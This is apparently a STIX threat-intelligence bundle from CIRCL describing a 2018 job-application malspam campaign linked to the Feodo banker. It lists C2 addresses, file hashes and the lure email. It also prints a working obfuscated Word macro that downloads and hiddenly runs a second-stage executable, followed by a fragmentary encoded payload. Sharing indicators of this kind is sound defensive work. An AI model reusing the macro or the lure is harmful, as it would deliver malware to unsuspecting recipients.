{
"type" : "bundle" ,
"id" : "bundle--5b07b46a-bc20-4e71-8a39-4aa0950d210f" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T11:16:57.000Z" ,
"modified" : "2018-05-25T11:16:57.000Z" ,
"name" : "CIRCL" ,
"identity_class" : "organization"
} ,
{
"type" : "grouping" ,
"spec_version" : "2.1" ,
"id" : "grouping--5b07b46a-bc20-4e71-8a39-4aa0950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T11:16:57.000Z" ,
"modified" : "2018-05-25T11:16:57.000Z" ,
"name" : "Malspam 2018-05-25: \"Regarding a job.\"" ,
"context" : "suspicious-activity" ,
"object_refs" : [
"indicator--5b07b4ac-5770-47f1-a145-4cc1950d210f" ,
"indicator--5b07b4ac-e5d4-4d38-8c1d-4627950d210f" ,
"x-misp-attribute--5b07b594-659c-4b2d-8b54-46af950d210f" ,
"observed-data--5b07b5e7-eae8-4e92-a0dc-424d950d210f" ,
"email-message--5b07b5e7-eae8-4e92-a0dc-424d950d210f" ,
"indicator--5b07cffc-bb94-4618-863f-49f0950d210f" ,
"indicator--5b07cffc-ecc4-49ca-bfb9-4343950d210f" ,
"indicator--5b07cffd-ec38-4319-831f-4087950d210f" ,
"indicator--5b07cffd-c580-405e-ba42-42a5950d210f" ,
"indicator--5b07cffe-5ac8-4d6e-8b6f-421e950d210f" ,
"indicator--5b07cffe-7be4-4dee-a711-4a45950d210f" ,
"indicator--5b07cfff-7998-4bf2-b7a8-4b11950d210f" ,
"indicator--5b07d000-9bfc-4d22-9a8a-4b51950d210f" ,
"indicator--5b07d000-96b0-4aa4-bee5-4fd0950d210f" ,
"indicator--5b07d001-7d14-4fbf-a05e-4b65950d210f" ,
"indicator--5b07d001-c034-45d8-ac30-469c950d210f" ,
"indicator--5b07d0ac-6840-4589-9eb7-496b950d210f" ,
"indicator--5b07d0ad-2990-49ca-82b5-4121950d210f" ,
"indicator--5b07d0ae-ed48-4869-9cd6-4c35950d210f" ,
"indicator--5b07d0af-b274-422d-85a0-4bdf950d210f" ,
"indicator--5b07d0af-92cc-4848-815d-48ce950d210f" ,
"indicator--5b07d0b0-9434-4888-86fc-4fc9950d210f" ,
"indicator--5b07d0b1-c940-4641-b73f-4263950d210f" ,
"indicator--5b07d0b2-a290-4484-a7aa-4cb2950d210f" ,
"indicator--5b07d0b3-0f64-4988-967c-40b2950d210f" ,
"indicator--5b07d0b4-94bc-4902-b6bf-423e950d210f" ,
"indicator--5b07d0b5-b87c-4202-bd71-4e66950d210f" ,
"indicator--5b07b502-35d0-4490-8947-4da6950d210f" ,
"indicator--5b07b547-3fd4-451f-b654-4fec950d210f" ,
"x-misp-object--19b89da3-fd67-4435-8c0a-e43223f4a68c" ,
"relationship--4fbb71a5-2ba8-4049-988f-d6fdbdab8828"
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"misp-galaxy:banker=\"Feodo\"" ,
"circl:incident-classification=\"malware\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07b4ac-5770-47f1-a145-4cc1950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:58:10.000Z" ,
"modified" : "2018-05-25T08:58:10.000Z" ,
"description" : "2nd stage location" ,
"pattern" : "[url:value = 'http://185.189.58.180/~filehost/background.png']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:58:10Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07b4ac-e5d4-4d38-8c1d-4627950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:58:04.000Z" ,
"modified" : "2018-05-25T08:58:04.000Z" ,
"description" : "2nd stage location" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.189.58.180']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:58:04Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5b07b594-659c-4b2d-8b54-46af950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T07:04:52.000Z" ,
"modified" : "2018-05-25T07:04:52.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_comment" : "contained macro" ,
"x_misp_type" : "text" ,
"x_misp_value" : "Rem Attribute VBA_ModuleType=VBADocumentModule\r\nOption VBASupport 1\r\nPrivate Sub Document_Open()\r\n\r\nDim WinHttpReq As Object\r\nSet WinHttpReq = CreateObject(\"Microsoft.XMLHTTP\")\r\n \r\nWinHttpReq.Open \"GET\", \"http://185.189.58.180/~filehost/background.png\", False, \"username\", \"password\"\r\nWinHttpReq.send\r\n\r\nDim first5 As String\r\n Dim second5 As String\r\n Dim last5 As String\r\n first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)\r\n second5 = ChrW(97) & ChrW(109)\r\n last5 = first5 + second5\r\n\r\nxyuhjnx = WinHttpReq.responseBody\r\nIf WinHttpReq.Status = 200 Then\r\n Set oStream = CreateObject(last5)\r\n oStream.Open\r\n oStream.Type = Val(\"1FFF\")\r\n oStream.Write WinHttpReq.responseBody\r\n \r\n Dim first6 As String\r\n Dim last6 As String\r\n first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)\r\n last6 = first6\r\n \r\n oStream.SaveToFile Environ(\"Temp\") + \"\\svchost.exe\", Val(\"2FFF\")\r\n oStream.Close\r\n \r\nEnd If\r\n \r\nCall Shell(Environ(\"Temp\") + \"\\svchost.exe\", 0)\r\n\r\nMsgBox \"The operating system you are using does not support secured documents. Please re-open the document on a different computer. The Microsoft Word will exit now.\"\r\n\r\nActiveDocument.Close\r\n\r\nEnd Sub"
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5b07b5e7-eae8-4e92-a0dc-424d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T07:06:15.000Z" ,
"modified" : "2018-05-25T07:06:15.000Z" ,
"first_observed" : "2018-05-25T07:06:15Z" ,
"last_observed" : "2018-05-25T07:06:15Z" ,
"number_observed" : 1 ,
"object_refs" : [
"email-message--5b07b5e7-eae8-4e92-a0dc-424d950d210f"
] ,
"labels" : [
"misp:type=\"email-body\"" ,
"misp:category=\"Payload delivery\""
]
} ,
{
"type" : "email-message" ,
"spec_version" : "2.1" ,
"id" : "email-message--5b07b5e7-eae8-4e92-a0dc-424d950d210f" ,
"is_multipart" : false ,
"body" : "Hello there! I hope you are well! \r\n\r\nI'm very interested in a opening.\r\nSee my attached CV and get back to me as soon as possible!\r\n\r\nThe file is password protected to protect against identity theft. The password is \"resume\" \r\nThank you! \r\n\r\nHerschel"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffc-bb94-4618-863f-49f0950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:32.000Z" ,
"modified" : "2018-05-25T08:57:32.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://80.82.115.164:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:32Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffc-ecc4-49ca-bfb9-4343950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:32.000Z" ,
"modified" : "2018-05-25T08:57:32.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://213.108.33.44/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:32Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffd-ec38-4319-831f-4087950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:33.000Z" ,
"modified" : "2018-05-25T08:57:33.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://27.254.150.53:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:33Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffd-c580-405e-ba42-42a5950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:33.000Z" ,
"modified" : "2018-05-25T08:57:33.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://189.51.144.3/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:33Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffe-5ac8-4d6e-8b6f-421e950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:34.000Z" ,
"modified" : "2018-05-25T08:57:34.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://159.203.94.198:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffe-7be4-4dee-a711-4a45950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:34.000Z" ,
"modified" : "2018-05-25T08:57:34.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://178.62.39.238:443/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cfff-7998-4bf2-b7a8-4b11950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:35.000Z" ,
"modified" : "2018-05-25T08:57:35.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://178.62.253.139:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:35Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d000-9bfc-4d22-9a8a-4b51950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:36.000Z" ,
"modified" : "2018-05-25T08:57:36.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://52.4.64.240:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:36Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d000-96b0-4aa4-bee5-4fd0950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:36.000Z" ,
"modified" : "2018-05-25T08:57:36.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://186.103.199.252:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:36Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d001-7d14-4fbf-a05e-4b65950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:37.000Z" ,
"modified" : "2018-05-25T08:57:37.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://71.244.60.231:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:37Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d001-c034-45d8-ac30-469c950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:37.000Z" ,
"modified" : "2018-05-25T08:57:37.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://84.200.208.98/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:37Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0ac-6840-4589-9eb7-496b950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:28.000Z" ,
"modified" : "2018-05-25T09:00:28.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '80.82.115.164' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:28Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0ad-2990-49ca-82b5-4121950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:29.000Z" ,
"modified" : "2018-05-25T09:00:29.000Z" ,
"description" : "C2" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '213.108.33.44']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:29Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0ae-ed48-4869-9cd6-4c35950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:30.000Z" ,
"modified" : "2018-05-25T09:00:30.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '27.254.150.53' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:30Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0af-b274-422d-85a0-4bdf950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:31.000Z" ,
"modified" : "2018-05-25T09:00:31.000Z" ,
"description" : "C2" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '189.51.144.3']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:31Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0af-92cc-4848-815d-48ce950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:31.000Z" ,
"modified" : "2018-05-25T09:00:31.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '159.203.94.198' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:31Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b0-9434-4888-86fc-4fc9950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:32.000Z" ,
"modified" : "2018-05-25T09:00:32.000Z" ,
"description" : "C2 On port 443" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '178.62.39.238' AND network-traffic:dst_port = '443']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:32Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b1-c940-4641-b73f-4263950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:33.000Z" ,
"modified" : "2018-05-25T09:00:33.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '178.62.253.139' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:33Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b2-a290-4484-a7aa-4cb2950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:34.000Z" ,
"modified" : "2018-05-25T09:00:34.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '52.4.64.240' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b3-0f64-4988-967c-40b2950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:35.000Z" ,
"modified" : "2018-05-25T09:00:35.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '71.244.60.231' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:35Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b4-94bc-4902-b6bf-423e950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:36.000Z" ,
"modified" : "2018-05-25T09:00:36.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '186.103.199.252' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:36Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b5-b87c-4202-bd71-4e66950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:37.000Z" ,
"modified" : "2018-05-25T09:00:37.000Z" ,
"description" : "C2" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '84.200.208.98']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:37Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07b502-35d0-4490-8947-4da6950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T07:02:26.000Z" ,
"modified" : "2018-05-25T07:02:26.000Z" ,
"description" : "document password: resume (as specified in the initial mail)" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' f c 3 a 527586746 a 950 d 51e0041 f 0 9266 a ' A N D f i l e : h a s h e s . S H A 1 = ' f c 56 a 18310 b e 9 c 7312 d c e b 2084 d f 0 3 b 0 282 d 3 f 37 ' A N D f i l e : h a s h e s . S H A 256 = ' d 5 a 8138 d 22083159836485 f f 0 d 9 b e 918902 b 0 2 c b c 0 609 a 67 f 2 c 5 f f 0 f 2e7 c 4431 ' A N D f i l e : n a m e = ' s c a n _ 38917 . d o c ' A N D f i l e : s i z e = ' 37888 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A E 0 4 u U x V B Z o p u G E A A A C U A A A g A B w A Z m M z Y T U y N z U 4 N j c 0 N m E 5 N T B k N T F l M D A 0 M W Y w O T I 2 N m F V V A k A A w K 1 B 1 s C t Q d b d X g L A A E E I Q A A A A Q h A A A A S I v j o j C v p s e C x 4 A O K e l k 6 l o L b e G g i K 0 a 0 m c V K V b U H F M b 2 I g G f V z L a e M i Z Y Z q l x s V U y 80 + U 2 D r I E n 766 N o 4 M 14 e V v o z 49 O o H R F S s 6 a f P 8 Q Q d H t a 2 r j C 77 i Y o B W 2 p 2 I g N c i K C U G D U r v / a H p b 67 Z E W 1 o M 788 a 2 i K u y Y 9 q A p S a J h p r j V 9 i h D A F D m e u H I M W O F j B 7 z 87 M K a 37 B 0 M C T p i y v + G E N u E / p U a u S 8 v T 2 H Z J 1 f z 5 q 3 L h D v 2 v E H S c w k Y a C n k H k P S y r Q s q 9 t + Q B 41 X O k e n C M B B p C j l A X P z F 5 h R Y 7 u T J a c 3 / V M 6 O y j T r e F N j r U N v u f k P 4 Q h y 4 t C u m K r 3 j 9 q 1 K 7 C x A n 0 O T u x o 83 D L U Z s N q D K s D S P E B D 7 f K L Z j 9 y 1 V u 3 p R p q y c H r + 73 T I 39 o + b s W y n 85 d s o 7 c 9 p e D L r p Z E U v A M Z t b N 5 H C I / 5 i a 7 e F t o 0 t 9 G N A N 5 + X 0 L 41 E k D 5 K y l c E M M L u C q c 4 s o 6 Y x d k 9 O a q m o / g e 8 Z J f E b k X 5 I q D u o I Z / L 5 C d n L 21 t K U + M D n n n N x q j Y V r J p s n p 8 u G 0 73 v r E N e n 2 R r Y 5 o w L C + 3 Z t 8 X g H I X 4 f g A t 5 u l 6 L o Z 271 o I u L H D S l f n v z 1 V 8 R d 6 b 5 E r H g / Q J m a c k C c P N t H F 4 G + K O F L D w f b D h u g S 2 H M t / 8 K V g 
C F O N q z O R T S 2 i Y x f Q z s v l 7 J j u M k p G 32 x C I x / z I 0 i A Q u q o J l u 1 g Q G 44 L T 2 C p I e O x B q C v D v g / Z K B n E T W 5 X m K n s G B o 20 d d 7 Q V k s x q j t / i w a K Q b U m i I W 97 c m 1 z D 9 p M Z r / Z B Z n 0 z Y d 3 q 0 4 Y m + h y N U H o X i L 9 c z W 9 d U g Y R Z Z V 2 / E y B t f N T c + i U 2 x M u c o 74 I p M 0 36 n + 6 l 0 X j I j P e C V m L f Q o z s c + B z 9 d 5 h W y 1 I / p C I V M o S p h Y I q z E o 7 Z A s / S L d q / H U d X c X 5 e f x f 37 s m F K w A f M J H I k p 2 u O T / l 3 c x w / t n v W E D P U k E T 0 l c T h Y z S V x P w N Y 0 K 6 c n 9 O 1 q q s i Q O h x d 8 f w T 7 E k F U w V p 2 e G 0 6 Y S u K 0 h l w X Q V T Q l X U H n 40 t G P E R S l S z B r W 6 P O c z n m U G l b F j R h X 3 R g l N + k 4 Z G 0 m f l d l B U H r Q G P q W y d 22 B n P k p I D 61 n Y J U w 19 g A 1 j F k b w T u 4 o m j G 3 b 0 s x C j w n O 6 o Q a S B l b R L M + m s k k H q j k 4 I u G T 3 / g T 